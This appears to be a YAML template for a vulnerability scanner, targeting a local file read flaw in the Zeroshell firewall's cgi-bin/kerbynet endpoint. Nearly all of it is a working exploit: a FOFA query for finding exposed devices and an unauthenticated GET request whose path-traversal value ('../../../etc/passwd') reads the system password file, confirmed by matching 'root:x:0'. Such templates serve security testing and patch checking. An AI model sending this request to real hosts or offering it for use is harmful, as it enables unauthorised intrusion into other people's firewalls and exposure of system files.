product: Zeroshell防火墙
vName: Zeroshell防火墙 cgi-bin-kerbynet 本地文件读取
type: 文件读取
vID: [ ]
level: 3
vDesc: ''
version: ''
note: ''
search:
  FOFA: app="Zeroshell-防火墙"
protocol: http
link: ''
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /cgi-bin/kerbynet?Section=NoAuthREQ&Action=Render&Object=../../../etc/passwd
    verify:
      logic: and
      check:
        - body:
            value:
              - 'root:x:0'
            logic: and
